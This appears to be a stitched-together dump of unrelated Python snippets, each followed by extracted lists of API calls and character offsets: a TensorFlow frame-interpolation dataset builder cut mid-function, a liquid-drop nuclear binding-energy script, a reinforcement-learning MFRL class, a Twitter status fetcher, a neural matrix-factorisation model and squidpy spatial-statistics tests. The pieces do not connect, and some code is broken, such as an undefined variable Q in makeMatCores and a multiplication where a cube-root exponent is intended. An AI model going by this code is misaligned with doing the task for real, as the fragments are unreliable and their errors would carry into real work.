"""Creates the evaluation datasets.
As opposed to create_training_dataset this function makes sure that the
examples for each dataset are always read in a deterministic (same) order.
Each given tfrecord should contain data in a format produced by
frame_interpolation/datasets/create_*_tfrecord.py
The (batch_size, crop_size, max_examples) are specified for all eval datasets.
Args:
batch_size: The number of images to batch per example.
files: List of paths to a sharded tfrecord in <tfrecord>@N format.
names: List of names of eval datasets.
crop_size: If > 0, images are cropped to crop_size x crop_size using
tensorflow's random cropping.
max_examples: If > 0, truncate the dataset to 'max_examples' in length. This
can be useful for speeding up evaluation loop in case the tfrecord for the
evaluation set is very large.
Returns:
A dict of name to tensorflow dataset for accessing examples that contain the
input images 'x0', 'x1', ground truth 'y' and time of the ground truth
'time'=[0,1] in a dictionary of tensors.
"""
return {
name: _create_from_sharded_tfrecord(batch_size, False, file, None,
crop_size, max_examples)
for name, file in zip(names, files)
}
| [
"tensorflow.image.random_crop",
"tensorflow.data.TFRecordDataset",
"tensorflow.io.decode_image",
"tensorflow.io.parse_single_example",
"tensorflow.concat",
"tensorflow.constant",
"absl.logging.warning",
"tensorflow.data.experimental.sample_from_datasets",
"tensorflow.io.FixedLenFeature",
"tensorflow.split"
] | [((2435, 2482), 'tensorflow.io.parse_single_example', 'tf.io.parse_single_example', (['sample', 'feature_map'], {}), '(sample, feature_map)\n', (2461, 2482), True, 'import tensorflow as tf\n'), ((4124, 4157), 'tensorflow.concat', 'tf.concat', (['image_to_crop'], {'axis': '(-1)'}), '(image_to_crop, axis=-1)\n', (4133, 4157), True, 'import tensorflow as tf\n'), ((4258, 4320), 'tensorflow.split', 'tf.split', (['cropped_images'], {'num_or_size_splits': 'channels', 'axis': '(-1)'}), '(cropped_images, num_or_size_splits=channels, axis=-1)\n', (4266, 4320), True, 'import tensorflow as tf\n'), ((5540, 5569), 'tensorflow.data.TFRecordDataset', 'tf.data.TFRecordDataset', (['file'], {}), '(file)\n', (5563, 5569), True, 'import tensorflow as tf\n'), ((999, 1053), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['()', 'tf.string'], {'default_value': '""""""'}), "((), tf.string, default_value='')\n", (1020, 1053), True, 'import tensorflow as tf\n'), ((1089, 1146), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['()', 'tf.string'], {'default_value': '"""jpg"""'}), "((), tf.string, default_value='jpg')\n", (1110, 1146), True, 'import tensorflow as tf\n'), ((1182, 1234), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['()', 'tf.int64'], {'default_value': '(0)'}), '((), tf.int64, default_value=0)\n', (1203, 1234), True, 'import tensorflow as tf\n'), ((1269, 1321), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['()', 'tf.int64'], {'default_value': '(0)'}), '((), tf.int64, default_value=0)\n', (1290, 1321), True, 'import tensorflow as tf\n'), ((1358, 1412), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['()', 'tf.string'], {'default_value': '""""""'}), "((), tf.string, default_value='')\n", (1379, 1412), True, 'import tensorflow as tf\n'), ((1448, 1505), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['()', 'tf.string'], {'default_value': '"""jpg"""'}), "((), tf.string, default_value='jpg')\n", (1469, 1505), True, 'import tensorflow as tf\n'), ((1541, 1593), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['()', 'tf.int64'], {'default_value': '(0)'}), '((), tf.int64, default_value=0)\n', (1562, 1593), True, 'import tensorflow as tf\n'), ((1628, 1680), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['()', 'tf.int64'], {'default_value': '(0)'}), '((), tf.int64, default_value=0)\n', (1649, 1680), True, 'import tensorflow as tf\n'), ((1717, 1771), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['()', 'tf.string'], {'default_value': '""""""'}), "((), tf.string, default_value='')\n", (1738, 1771), True, 'import tensorflow as tf\n'), ((1807, 1864), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['()', 'tf.string'], {'default_value': '"""jpg"""'}), "((), tf.string, default_value='jpg')\n", (1828, 1864), True, 'import tensorflow as tf\n'), ((1900, 1952), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['()', 'tf.int64'], {'default_value': '(0)'}), '((), tf.int64, default_value=0)\n', (1921, 1952), True, 'import tensorflow as tf\n'), ((1987, 2039), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['()', 'tf.int64'], {'default_value': '(0)'}), '((), tf.int64, default_value=0)\n', (2008, 2039), True, 'import tensorflow as tf\n'), ((2065, 2119), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['()', 'tf.string'], {'default_value': '""""""'}), "((), tf.string, default_value='')\n", (2086, 2119), True, 'import tensorflow as tf\n'), ((2513, 2578), 'tensorflow.io.decode_image', 'tf.io.decode_image', (["features['frame_0/encoded']"], {'dtype': 'tf.float32'}), "(features['frame_0/encoded'], dtype=tf.float32)\n", (2531, 2578), True, 'import tensorflow as tf\n'), ((2592, 2657), 'tensorflow.io.decode_image', 'tf.io.decode_image', (["features['frame_2/encoded']"], {'dtype': 'tf.float32'}), "(features['frame_2/encoded'], dtype=tf.float32)\n", (2610, 2657), True, 'import tensorflow as tf\n'), ((2670, 2735), 'tensorflow.io.decode_image', 'tf.io.decode_image', (["features['frame_1/encoded']"], {'dtype': 'tf.float32'}), "(features['frame_1/encoded'], dtype=tf.float32)\n", (2688, 2735), True, 'import tensorflow as tf\n'), ((3294, 3349), 'tensorflow.constant', 'tf.constant', (['[crop_size, crop_size, total_channel_size]'], {}), '([crop_size, crop_size, total_channel_size])\n', (3305, 3349), True, 'import tensorflow as tf\n'), ((3363, 3403), 'tensorflow.image.random_crop', 'tf.image.random_crop', (['images', 'crop_shape'], {}), '(images, crop_shape)\n', (3383, 3403), True, 'import tensorflow as tf\n'), ((8844, 8962), 'absl.logging.warning', 'logging.warning', (['"""gin-configurable training_dataset.file is deprecated. Use training_dataset.files instead."""'], {}), "(\n 'gin-configurable training_dataset.file is deprecated. Use training_dataset.files instead.'\n )\n", (8859, 8962), False, 'from absl import logging\n'), ((9623, 9672), 'tensorflow.data.experimental.sample_from_datasets', 'tf.data.experimental.sample_from_datasets', (['tables'], {}), '(tables)\n', (9664, 9672), True, 'import tensorflow as tf\n')] |
import matplotlib.pyplot as plt
import numpy as np
#returns the binding energy predicted by nuclear liquid drop model
def BE_liquidDrop(N,Z): #N=num of neutrons, Z=num of protons
#num of nucleons
A = N+Z
#physical constants (from Alex's notes, in MeV)
a1 = 15.49
a2 = 17.23
a3 = 0.697
a4 = 22.6
#nuclear liquid drop model
return a1*A - a2*A**(2./3) - a3*(Z**2)/(A*(1./3)) - a4*(N-Z)**2/A
#finds the neutron dripline
def findDripLine(Z):
#test statement for finding dripline
check = False
#start with symmetric nucleus
N=Z
#iterative search for dripline
while (check == False):
BE_i = BE_liquidDrop(N+1,Z)
BE_f = BE_liquidDrop(N,Z)
Q = BE_f-BE_i
if (Q>0):
return N
else:
N = N+1
def makeMatCores(Zrange):
Nstart = 0
Nrange = int(2.3*Zrange)
Zstart = 1
mat = np.zeros((Zrange-Zstart,Nrange-Nstart))
for Z in range(Zstart,Zrange):
for N in range(Nstart,Nrange):
BE_i_up = BE_liquidDrop(N+1,Z)
BE_f_up = BE_liquidDrop(N,Z)
Qup = BE_f_up-BE_i_up
BE_i_down = BE_liquidDrop(N+1,Z)
BE_f_down = BE_liquidDrop(N,Z)
Qdown = BE_f_down-BE_i_down
if (Q<0):
mat[Z-Zstart, N-Nstart] = 1
else:
mat[Z-Zstart, N-Nstart] = 0
return mat
#plt.matshow(makeMatCores(100,100))
#define range of Z's
Z_low = 2
Z_top = 150
mat = makeMatCores(Z_top)
img2 = plt.imshow(mat,interpolation='nearest',
origin='lower')
plt.show()
#interested in finding the neutron drip line for the range Z=36-44
#Z = range(Z_low, Z_top+1)
#N = []
#
#for z in Z:
# dripline = findDripLine(z)
# print "For", z,"protons, the neutron dripline is",dripline, "neutrons"
# N.append(dripline)
#
#mat = np.zeros((max(Z)+1,max(N)+1))
#
#for i in range(0,len(Z)):
# mat[Z[i],N[i]] = 1
#plt.matshow(mat)
#plt.show()
| [
"numpy.zeros",
"matplotlib.pyplot.imshow",
"matplotlib.pyplot.show"
] | [((1336, 1392), 'matplotlib.pyplot.imshow', 'plt.imshow', (['mat'], {'interpolation': '"""nearest"""', 'origin': '"""lower"""'}), "(mat, interpolation='nearest', origin='lower')\n", (1346, 1392), True, 'import matplotlib.pyplot as plt\n'), ((1412, 1422), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1420, 1422), True, 'import matplotlib.pyplot as plt\n'), ((810, 854), 'numpy.zeros', 'np.zeros', (['(Zrange - Zstart, Nrange - Nstart)'], {}), '((Zrange - Zstart, Nrange - Nstart))\n', (818, 854), True, 'import numpy as np\n')] |
import gym
from gym.spaces import Box
import numpy as np
import torch as T
import rl.environments
from rl.data.buffer import TrajBuffer, ReplayBuffer
# from rl.data.buffer import TrajBuffer, ReplayBufferNP
# def make_env(env_id, seed, idx, capture_video, run_name):
# def thunk():
# print('in thunk')
# env = gym.make(env_id)
# env = gym.wrappers.RecordEpisodeStatistics(env)
# if capture_video:
# if idx == 0:
# env = gym.wrappers.RecordVideo(env, f"videos/{run_name}")
# env = gym.wrappers.ClipAction(env)
# env = gym.wrappers.NormalizeObservation(env)
# env = gym.wrappers.TransformObservation(env, lambda obs: np.clip(obs, -10, 10))
# env = gym.wrappers.NormalizeReward(env)
# env = gym.wrappers.TransformReward(env, lambda reward: np.clip(reward, -10, 10))
# env.seed(seed)
# env.action_space.seed(seed)
# env.observation_space.seed(seed)
# return env
#
# return thunk
class MFRL:
"""
Model-Free Reinforcement Learning
"""
def __init__(self, exp_prefix, configs, seed, device):
# super(MFRL, self).__init__(configs, seed)
# print('init MBRL!')
self.exp_prefix = exp_prefix
self.configs = configs
self.seed = seed
self._device_ = device
def _build(self):
self._set_env()
self._set_buffer()
def _set_env(self):
name = self.configs['environment']['name']
evaluate = self.configs['algorithm']['evaluation']
# Inintialize Learning environment
self.learn_env = gym.make(name)
self._seed_env(self.learn_env)
assert isinstance (self.learn_env.action_space, Box), "Works only with continuous action space"
if evaluate:
# Ininialize Evaluation environment
self.eval_env = gym.make(name)
self._seed_env(self.eval_env)
else:
self.eval_env = None
# Spaces dimensions
self.obs_dim = self.learn_env.observation_space.shape[0]
self.act_dim = self.learn_env.action_space.shape[0]
self.act_up_lim = self.learn_env.action_space.high
self.act_low_lim = self.learn_env.action_space.low
def _seed_env(self, env):
env.seed(self.seed)
env.action_space.seed(self.seed)
env.observation_space.seed(self.seed)
def _set_buffer(self):
max_size = self.configs['data']['buffer_size']
device = self._device_
if self.configs['algorithm']['on-policy']:
max_size = self.configs['data']['batch_size']
num_traj = max_size//20
horizon = 1000
self.buffer = TrajBuffer(self.obs_dim, self.act_dim, horizon, num_traj, max_size, self.seed, device)
else:
self.buffer = ReplayBuffer(self.obs_dim, self.act_dim, max_size, self.seed, device)
def initialize_buffer(self, num_traj=400):
# print('Initialize a New Buffer..')
seed = self.seed
device = self._device_
if self.configs['algorithm']['on-policy']:
# num_traj = 40
horizon = 1000
max_size = self.configs['data']['batch_size']
self.buffer = TrajBuffer(self.obs_dim, self.act_dim, horizon, num_traj, max_size, self.seed, device)
def initialize_learning(self, NT, Ni):
max_el = self.configs['environment']['horizon']
o, Z, el, t = self.learn_env.reset(), 0, 0, 0
if Ni < 1: return o, Z, el, t
print(f'[ Initial exploaration ] Starting')
for ni in range(1, Ni+1):
print(f'[ Initial exploaration ] Epoch {ni}')
nt = 0
while nt < NT:
# Random actions
a = self.learn_env.action_space.sample()
o_next, r, d, info = self.learn_env.step(a)
d = True if el == max_el else d # Ignore artificial termination
self.buffer.store_transition(o, a, r, o_next, d)
o = o_next
Z += r
el +=1
t +=1
if d or (el == max_el): o, Z, el = self.learn_env.reset(), 0, 0
nt += 1
return o, Z, el, t
def internact_op(self, n, o, d, Z, el, t):
Nt = self.configs['algorithm']['learning']['epoch_steps']
max_el = self.configs['environment']['horizon']
# a = self.actor_critic.get_action_np(o)
with T.no_grad(): a, log_pi, v = self.actor_critic.get_a_and_v_np(T.Tensor(o))
# print('log_pi: ', log_pi)
o_next, r, d_next, _ = self.learn_env.step(a)
Z += r
el += 1
t += 1
self.buffer.store_transition(o, a, r, d, v, log_pi, el)
if d_next or (el == max_el):
# o_next, Z, el = self.learn_env.reset(), 0, 0
with T.no_grad(): v_next = self.actor_critic.get_v(T.Tensor(o_next)).cpu()
self.buffer.traj_tail(d_next, v_next, el)
# print(f'termination: t={t} | el={el} | total_size={self.buffer.total_size()}')
o_next, d_next, Z, el = self.learn_env.reset(), 0, 0, 0
o, d = o_next, d_next
return o, d, Z, el, t
def internact_opB(self, n, o, Z, el, t):
Nt = self.configs['algorithm']['learning']['epoch_steps']
max_el = self.configs['environment']['horizon']
# a = self.actor_critic.get_action_np(o)
with T.no_grad(): a, log_pi, v = self.actor_critic.get_a_and_v_np(T.Tensor(o))
# print('log_pi: ', log_pi)
o_next, r, d, _ = self.learn_env.step(a)
Z += r
el += 1
t += 1
self.buffer.store(o, a, r, o_next, v, log_pi, el)
o = o_next
if d or (el == max_el):
if el == max_el:
with T.no_grad(): v = self.actor_critic.get_v(T.Tensor(o)).cpu()
else:
# print('v=0')
v = T.Tensor([0.0])
self.buffer.finish_path(el, v)
# print(f'termination: t={t} | el={el} | total_size={self.buffer.total_size()}')
o, Z, el = self.learn_env.reset(), 0, 0
return o, Z, el, t
def internact(self, n, o, Z, el, t):
Nx = self.configs['algorithm']['learning']['expl_epochs']
max_el = self.configs['environment']['horizon']
if n > Nx:
a = self.actor_critic.get_action_np(o) # Stochastic action | No reparameterization # Deterministic action | No reparameterization
else:
a = self.learn_env.action_space.sample()
o_next, r, d, _ = self.learn_env.step(a)
d = False if el == max_el else d # Ignore artificial termination
self.buffer.store_transition(o, a, r, o_next, d)
o = o_next
Z += r
el +=1
t +=1
if d or (el == max_el): o, Z, el = self.learn_env.reset(), 0, 0
return o, Z, el, t
def evaluate_op(self):
evaluate = self.configs['algorithm']['evaluation']
if evaluate:
print('[ Evaluation ]')
EE = self.configs['algorithm']['evaluation']['eval_episodes']
max_el = self.configs['environment']['horizon']
EZ = [] # Evaluation episodic return
ES = [] # Evaluation episodic score
EL = [] # Evaluation episodic length
for ee in range(1, EE+1):
print(f' [ Agent Evaluation ] Episode: {ee} ', end='\r')
o, d, Z, S, el = self.eval_env.reset(), False, 0, 0, 0
while not(d or (el == max_el)):
# with T.no_grad(): a, _, _ = self.actor_critic.get_pi(T.Tensor(o))
a = self.actor_critic.get_action_np(o, deterministic=True)
# a = self.actor_critic.get_action_np(o, deterministic=True)
o, r, d, info = self.eval_env.step(a)
Z += r
if self.configs['environment']['type'] == 'mujoco-pddm-shadowhand': S += info['score']
el += 1
EZ.append(Z)
if self.configs['environment']['type'] == 'mujoco-pddm-shadowhand': ES.append(S/el)
EL.append(el)
# if self.configs['environment']['type'] == 'mujoco-pddm-shadowhand':
# for i in range(len(ES)):
# ES[i] /= EL[i]
return EZ, ES, EL
def evaluate(self):
evaluate = self.configs['algorithm']['evaluation']
if evaluate:
print('[ Evaluation ]')
EE = self.configs['algorithm']['evaluation']['eval_episodes']
max_el = self.configs['environment']['horizon']
EZ = [] # Evaluation episodic return
ES = [] # Evaluation episodic score
EL = [] # Evaluation episodic length
for ee in range(1, EE+1):
print(f' [ Agent Evaluation ] Episode: {ee} ', end='\r')
o, d, Z, S, el = self.eval_env.reset(), False, 0, 0, 0
while not(d or (el == max_el)):
# Take deterministic actions at evaluation time
a = self.actor_critic.get_action_np(o, deterministic=True) # Deterministic action | No reparameterization
o, r, d, info = self.eval_env.step(a)
Z += r
if self.configs['environment']['type'] == 'mujoco-pddm-shadowhand': S += info['score']
el += 1
EZ.append(Z)
if self.configs['environment']['type'] == 'mujoco-pddm-shadowhand': ES.append(S/el)
EL.append(el)
# if self.configs['environment']['type'] == 'mujoco-pddm-shadowhand':
# for i in range(len(ES)):
# ES[i] /= EL[i]
return EZ, ES, EL
| [
"gym.make",
"rl.data.buffer.ReplayBuffer",
"torch.Tensor",
"rl.data.buffer.TrajBuffer",
"torch.no_grad"
] | [((1634, 1648), 'gym.make', 'gym.make', (['name'], {}), '(name)\n', (1642, 1648), False, 'import gym\n'), ((1890, 1904), 'gym.make', 'gym.make', (['name'], {}), '(name)\n', (1898, 1904), False, 'import gym\n'), ((2726, 2817), 'rl.data.buffer.TrajBuffer', 'TrajBuffer', (['self.obs_dim', 'self.act_dim', 'horizon', 'num_traj', 'max_size', 'self.seed', 'device'], {}), '(self.obs_dim, self.act_dim, horizon, num_traj, max_size, self.\n seed, device)\n', (2736, 2817), False, 'from rl.data.buffer import TrajBuffer, ReplayBuffer\n'), ((2853, 2922), 'rl.data.buffer.ReplayBuffer', 'ReplayBuffer', (['self.obs_dim', 'self.act_dim', 'max_size', 'self.seed', 'device'], {}), '(self.obs_dim, self.act_dim, max_size, self.seed, device)\n', (2865, 2922), False, 'from rl.data.buffer import TrajBuffer, ReplayBuffer\n'), ((3264, 3355), 'rl.data.buffer.TrajBuffer', 'TrajBuffer', (['self.obs_dim', 'self.act_dim', 'horizon', 'num_traj', 'max_size', 'self.seed', 'device'], {}), '(self.obs_dim, self.act_dim, horizon, num_traj, max_size, self.\n seed, device)\n', (3274, 3355), False, 'from rl.data.buffer import TrajBuffer, ReplayBuffer\n'), ((4497, 4508), 'torch.no_grad', 'T.no_grad', ([], {}), '()\n', (4506, 4508), True, 'import torch as T\n'), ((5468, 5479), 'torch.no_grad', 'T.no_grad', ([], {}), '()\n', (5477, 5479), True, 'import torch as T\n'), ((4558, 4569), 'torch.Tensor', 'T.Tensor', (['o'], {}), '(o)\n', (4566, 4569), True, 'import torch as T\n'), ((4887, 4898), 'torch.no_grad', 'T.no_grad', ([], {}), '()\n', (4896, 4898), True, 'import torch as T\n'), ((5529, 5540), 'torch.Tensor', 'T.Tensor', (['o'], {}), '(o)\n', (5537, 5540), True, 'import torch as T\n'), ((5961, 5976), 'torch.Tensor', 'T.Tensor', (['[0.0]'], {}), '([0.0])\n', (5969, 5976), True, 'import torch as T\n'), ((5832, 5843), 'torch.no_grad', 'T.no_grad', ([], {}), '()\n', (5841, 5843), True, 'import torch as T\n'), ((4933, 4949), 'torch.Tensor', 'T.Tensor', (['o_next'], {}), '(o_next)\n', (4941, 4949), True, 'import torch as T\n'), ((5873, 5884), 'torch.Tensor', 'T.Tensor', (['o'], {}), '(o)\n', (5881, 5884), True, 'import torch as T\n')] |
#!/usr/bin/env python
#Update your .twconfig file on this same directory
#with your own api keys and secrets
#Get them signing up at https://apps.twitter.com
#Install required modules with
#'pip install -r requirements.txt'
import configparser
import os
import sys
import json
import twitter
def jdefault(o):
return o.__dict__
#usage: print(json.dumps(string, default=jdefault))
def main():
#Twitter status id to fetch
statusId = '973464578708316161'
try:
sys.stdout.write('reading config file... ')
config = configparser.RawConfigParser()
config.read('.twconfig')
print('success!')
except:
print('failed to read config file!')
exit()
try:
sys.stdout.write('connecting to api... ')
api = twitter.Api(consumer_key=config.get('keys', 'consumer_key'),
consumer_secret=config.get('keys', 'consumer_secret'),
access_token_key=config.get('keys', 'access_key'),
access_token_secret=config.get('keys', 'access_secret'))
print('success!')
except Exception as e:
print('failed to connect to twitter api!')
print(e)
exit()
try:
sys.stdout.write('fetching status %s... ' % statusId )
status = api.GetStatus(statusId)
print('success!')
except:
print('failed to get status!')
exit()
try:
print('writing to file out.txt... ')
with open(statusId + '.txt', 'w') as outfile:
statusparsed = json.loads(str(status).encode())
outfile.write(json.dumps(status, default=jdefault) + '\n')
sys.stdout.write('Created at: ' + statusparsed['created_at'])
outfile.closed
except:
print('failed writing to file!')
exit()
if __name__ == "__main__":
main()
| [
"sys.stdout.write",
"configparser.RawConfigParser",
"json.dumps"
] | [((477, 520), 'sys.stdout.write', 'sys.stdout.write', (['"""reading config file... """'], {}), "('reading config file... ')\n", (493, 520), False, 'import sys\n'), ((532, 562), 'configparser.RawConfigParser', 'configparser.RawConfigParser', ([], {}), '()\n', (560, 562), False, 'import configparser\n'), ((675, 716), 'sys.stdout.write', 'sys.stdout.write', (['"""connecting to api... """'], {}), "('connecting to api... ')\n", (691, 716), False, 'import sys\n'), ((1076, 1129), 'sys.stdout.write', 'sys.stdout.write', (["('fetching status %s... ' % statusId)"], {}), "('fetching status %s... ' % statusId)\n", (1092, 1129), False, 'import sys\n'), ((1446, 1507), 'sys.stdout.write', 'sys.stdout.write', (["('Created at: ' + statusparsed['created_at'])"], {}), "('Created at: ' + statusparsed['created_at'])\n", (1462, 1507), False, 'import sys\n'), ((1398, 1434), 'json.dumps', 'json.dumps', (['status'], {'default': 'jdefault'}), '(status, default=jdefault)\n', (1408, 1434), False, 'import json\n')] |
import tensorflow as tf
def neural_mf(user_input, item_input, y_, num_users, num_items, embed_partitioner=None):
embed_dim = 8
layers = [64, 32, 16, 8]
learning_rate = 0.01
with tf.compat.v1.variable_scope('nmf', dtype=tf.float32):
with tf.device('/cpu:0'):
User_Embedding = tf.compat.v1.get_variable(name="user_embed", shape=(
num_users, embed_dim + layers[0] // 2), initializer=tf.random_normal_initializer(stddev=0.01), partitioner=embed_partitioner)
Item_Embedding = tf.compat.v1.get_variable(name="item_embed", shape=(
num_items, embed_dim + layers[0] // 2), initializer=tf.random_normal_initializer(stddev=0.01), partitioner=embed_partitioner)
user_latent = tf.nn.embedding_lookup(User_Embedding, user_input)
item_latent = tf.nn.embedding_lookup(Item_Embedding, item_input)
W1 = tf.compat.v1.get_variable(name='W1', shape=(
layers[0], layers[1]), initializer=tf.random_normal_initializer(stddev=0.1))
W2 = tf.compat.v1.get_variable(name='W2', shape=(
layers[1], layers[2]), initializer=tf.random_normal_initializer(stddev=0.1))
W3 = tf.compat.v1.get_variable(name='W3', shape=(
layers[2], layers[3]), initializer=tf.random_normal_initializer(stddev=0.1))
W4 = tf.compat.v1.get_variable(name='W4', shape=(
embed_dim + layers[3], 1), initializer=tf.random_normal_initializer(stddev=0.1))
with tf.device('/gpu:0'):
mf_user_latent, mlp_user_latent = tf.split(
user_latent, [embed_dim, layers[0] // 2], 1)
mf_item_latent, mlp_item_latent = tf.split(
item_latent, [embed_dim, layers[0] // 2], 1)
mf_vector = tf.multiply(mf_user_latent, mf_item_latent)
mlp_vector = tf.concat((mlp_user_latent, mlp_item_latent), 1)
fc1 = tf.matmul(mlp_vector, W1)
relu1 = tf.nn.relu(fc1)
fc2 = tf.matmul(relu1, W2)
relu2 = tf.nn.relu(fc2)
fc3 = tf.matmul(relu2, W3)
relu3 = tf.nn.relu(fc3)
concat_vector = tf.concat((mf_vector, relu3), 1)
y = tf.reshape(tf.matmul(concat_vector, W4), (-1,))
loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=y, labels=y_)
loss = tf.reduce_mean(loss)
y = tf.sigmoid(y)
optimizer = tf.compat.v1.train.GradientDescentOptimizer(
learning_rate)
return loss, y, optimizer
| [
"tensorflow.nn.relu",
"tensorflow.compat.v1.variable_scope",
"tensorflow.nn.embedding_lookup",
"tensorflow.device",
"tensorflow.reduce_mean",
"tensorflow.concat",
"tensorflow.nn.sigmoid_cross_entropy_with_logits",
"tensorflow.compat.v1.train.GradientDescentOptimizer",
"tensorflow.multiply",
"tensorflow.matmul",
"tensorflow.random_normal_initializer",
"tensorflow.split",
"tensorflow.sigmoid"
] | [((196, 248), 'tensorflow.compat.v1.variable_scope', 'tf.compat.v1.variable_scope', (['"""nmf"""'], {'dtype': 'tf.float32'}), "('nmf', dtype=tf.float32)\n", (223, 248), True, 'import tensorflow as tf\n'), ((263, 282), 'tensorflow.device', 'tf.device', (['"""/cpu:0"""'], {}), "('/cpu:0')\n", (272, 282), True, 'import tensorflow as tf\n'), ((759, 809), 'tensorflow.nn.embedding_lookup', 'tf.nn.embedding_lookup', (['User_Embedding', 'user_input'], {}), '(User_Embedding, user_input)\n', (781, 809), True, 'import tensorflow as tf\n'), ((836, 886), 'tensorflow.nn.embedding_lookup', 'tf.nn.embedding_lookup', (['Item_Embedding', 'item_input'], {}), '(Item_Embedding, item_input)\n', (858, 886), True, 'import tensorflow as tf\n'), ((1526, 1545), 'tensorflow.device', 'tf.device', (['"""/gpu:0"""'], {}), "('/gpu:0')\n", (1535, 1545), True, 'import tensorflow as tf\n'), ((1593, 1646), 'tensorflow.split', 'tf.split', (['user_latent', '[embed_dim, layers[0] // 2]', '(1)'], {}), '(user_latent, [embed_dim, layers[0] // 2], 1)\n', (1601, 1646), True, 'import tensorflow as tf\n'), ((1710, 1763), 'tensorflow.split', 'tf.split', (['item_latent', '[embed_dim, layers[0] // 2]', '(1)'], {}), '(item_latent, [embed_dim, layers[0] // 2], 1)\n', (1718, 1763), True, 'import tensorflow as tf\n'), ((1805, 1848), 'tensorflow.multiply', 'tf.multiply', (['mf_user_latent', 'mf_item_latent'], {}), '(mf_user_latent, mf_item_latent)\n', (1816, 1848), True, 'import tensorflow as tf\n'), ((1874, 1922), 'tensorflow.concat', 'tf.concat', (['(mlp_user_latent, mlp_item_latent)', '(1)'], {}), '((mlp_user_latent, mlp_item_latent), 1)\n', (1883, 1922), True, 'import tensorflow as tf\n'), ((1941, 1966), 'tensorflow.matmul', 'tf.matmul', (['mlp_vector', 'W1'], {}), '(mlp_vector, W1)\n', (1950, 1966), True, 'import tensorflow as tf\n'), ((1987, 2002), 'tensorflow.nn.relu', 'tf.nn.relu', (['fc1'], {}), '(fc1)\n', (1997, 2002), True, 'import tensorflow as tf\n'), ((2021, 2041), 'tensorflow.matmul', 'tf.matmul', (['relu1', 'W2'], {}), '(relu1, W2)\n', (2030, 2041), True, 'import tensorflow as tf\n'), ((2062, 2077), 'tensorflow.nn.relu', 'tf.nn.relu', (['fc2'], {}), '(fc2)\n', (2072, 2077), True, 'import tensorflow as tf\n'), ((2096, 2116), 'tensorflow.matmul', 'tf.matmul', (['relu2', 'W3'], {}), '(relu2, W3)\n', (2105, 2116), True, 'import tensorflow as tf\n'), ((2137, 2152), 'tensorflow.nn.relu', 'tf.nn.relu', (['fc3'], {}), '(fc3)\n', (2147, 2152), True, 'import tensorflow as tf\n'), ((2181, 2213), 'tensorflow.concat', 'tf.concat', (['(mf_vector, relu3)', '(1)'], {}), '((mf_vector, relu3), 1)\n', (2190, 2213), True, 'import tensorflow as tf\n'), ((2297, 2357), 'tensorflow.nn.sigmoid_cross_entropy_with_logits', 'tf.nn.sigmoid_cross_entropy_with_logits', ([], {'logits': 'y', 'labels': 'y_'}), '(logits=y, labels=y_)\n', (2336, 2357), True, 'import tensorflow as tf\n'), ((2377, 2397), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['loss'], {}), '(loss)\n', (2391, 2397), True, 'import tensorflow as tf\n'), ((2414, 2427), 'tensorflow.sigmoid', 'tf.sigmoid', (['y'], {}), '(y)\n', (2424, 2427), True, 'import tensorflow as tf\n'), ((2452, 2510), 'tensorflow.compat.v1.train.GradientDescentOptimizer', 'tf.compat.v1.train.GradientDescentOptimizer', (['learning_rate'], {}), '(learning_rate)\n', (2495, 2510), True, 'import tensorflow as tf\n'), ((2241, 2269), 'tensorflow.matmul', 'tf.matmul', (['concat_vector', 'W4'], {}), '(concat_vector, W4)\n', (2250, 2269), True, 'import tensorflow as tf\n'), ((434, 475), 'tensorflow.random_normal_initializer', 'tf.random_normal_initializer', ([], {'stddev': '(0.01)'}), '(stddev=0.01)\n', (462, 475), True, 'import tensorflow as tf\n'), ((658, 699), 'tensorflow.random_normal_initializer', 'tf.random_normal_initializer', ([], {'stddev': '(0.01)'}), '(stddev=0.01)\n', (686, 699), True, 'import tensorflow as tf\n'), ((1001, 1041), 'tensorflow.random_normal_initializer', 'tf.random_normal_initializer', ([], {'stddev': '(0.1)'}), '(stddev=0.1)\n', (1029, 1041), True, 'import tensorflow as tf\n'), ((1156, 1196), 'tensorflow.random_normal_initializer', 'tf.random_normal_initializer', ([], {'stddev': '(0.1)'}), '(stddev=0.1)\n', (1184, 1196), True, 'import tensorflow as tf\n'), ((1311, 1351), 'tensorflow.random_normal_initializer', 'tf.random_normal_initializer', ([], {'stddev': '(0.1)'}), '(stddev=0.1)\n', (1339, 1351), True, 'import tensorflow as tf\n'), ((1470, 1510), 'tensorflow.random_normal_initializer', 'tf.random_normal_initializer', ([], {'stddev': '(0.1)'}), '(stddev=0.1)\n', (1498, 1510), True, 'import tensorflow as tf\n')] |
import pytest
from anndata import AnnData
from pandas.testing import assert_frame_equal
import numpy as np
from squidpy.gr import moran, ripley_k, co_occurrence
MORAN_K = "moranI"
def test_ripley_k(adata: AnnData):
"""Check ripley score and shape."""
ripley_k(adata, cluster_key="leiden")
# assert ripley in adata.uns
assert "ripley_k_leiden" in adata.uns.keys()
# assert clusters intersection
cat_ripley = set(adata.uns["ripley_k_leiden"]["leiden"].unique())
cat_adata = set(adata.obs["leiden"].cat.categories)
assert cat_ripley.isdisjoint(cat_adata) is False
def test_moran_seq_par(dummy_adata: AnnData):
"""Check whether moran results are the same for seq. and parallel computation."""
moran(dummy_adata)
dummy_adata.var["highly_variable"] = np.random.choice([True, False], size=dummy_adata.var_names.shape)
df = moran(dummy_adata, copy=True, n_jobs=1, seed=42, n_perms=50)
df_parallel = moran(dummy_adata, copy=True, n_jobs=2, seed=42, n_perms=50)
idx_df = df.index.values
idx_adata = dummy_adata[:, dummy_adata.var.highly_variable.values].var_names.values
assert MORAN_K in dummy_adata.uns.keys()
assert "pval_sim_fdr_bh" in dummy_adata.uns[MORAN_K]
